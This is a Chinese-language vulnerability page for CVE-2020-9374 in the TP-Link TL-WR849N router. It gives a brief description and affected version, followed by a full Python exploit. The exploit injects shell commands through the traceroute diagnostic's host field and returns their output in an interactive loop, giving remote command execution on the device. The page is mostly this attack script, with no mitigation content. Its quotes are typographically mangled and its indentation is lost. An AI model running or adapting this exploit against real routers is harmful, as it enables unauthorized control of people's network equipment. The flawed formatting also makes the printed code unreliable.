(CVE-2020-9374)TP-Link TL-WR849N 远程命令执行漏洞

一、漏洞简介

在TP-Link TL-WR849N 0.9.1 4.16设备上,当攻击者将特定的外壳元字符发送到面板的traceroute功能时,可以利用诊断区域中的远程命令执行漏洞。

二、漏洞影响

TP-Link TL-WR849N 0.9.1 4.16

三、复现过程

# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-2020-9374
import requests
def output(headers,cookies):

url = ‘http://192.168.0.1/cgi?1’

data = ‘’

data += ‘[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a’

data += ‘diagnosticsState\x0d\x0a’

data += ‘X_TP_HopSeq\x0d\x0a’

data += ‘X_TP_Result\x0d\x0a’

r = requests.post(url,data=data,headers=headers,cookies=cookies)

saida = r.text

filtro = saida.replace(’: Name or service not known’,’’)

filtro = filtro.replace(’[0,0,0,0,0,0]0’,’’)

filtro = filtro.replace(‘diagnosticsState=’,’’)

filtro = filtro.replace(‘X_TP_HopSeq=0’,’’)

filtro = filtro.replace(‘X_TP_Result=’,’’)

print(filtro[:-8])
def aceppt(headers,cookies):

url = ‘http://192.168.0.1/cgi?7’

data = ‘[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a’

r = requests.post(url,data=data,headers=headers,cookies=cookies)

output(headers,cookies)
def inject(command,headers,cookies):

url = ‘http://192.168.0.1/cgi?2’

data = ‘’

data += ‘[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a’

data += ‘maxHopCount=20\x0d\x0a’

data += ‘timeout=5\x0d\x0a’

data += ‘numberOfTries=1\x0d\x0a’

data += ‘host="$(’+command+’)"\x0d\x0a’

data += ‘dataBlockSize=64\x0d\x0a’

data += ‘X_TP_ConnName=ewan_pppoe\x0d\x0a’

data += ‘diagnosticsState=Requested\x0d\x0a’

data += ‘X_TP_HopSeq=0\x0d\x0a’

r = requests.post(url,data=data,headers=headers,cookies=cookies)

aceppt(headers,cookies)
def main():

cookies = {“Authorization”: “Basic REPLACEBASE64AUTH”}

headers = {‘Content-Type’: ‘text/plain’,

‘Referer’: ‘http://192.168.0.1/mainFrame.htm’}

while True:

command = input(’$ ')

inject(command,headers,cookies)
main()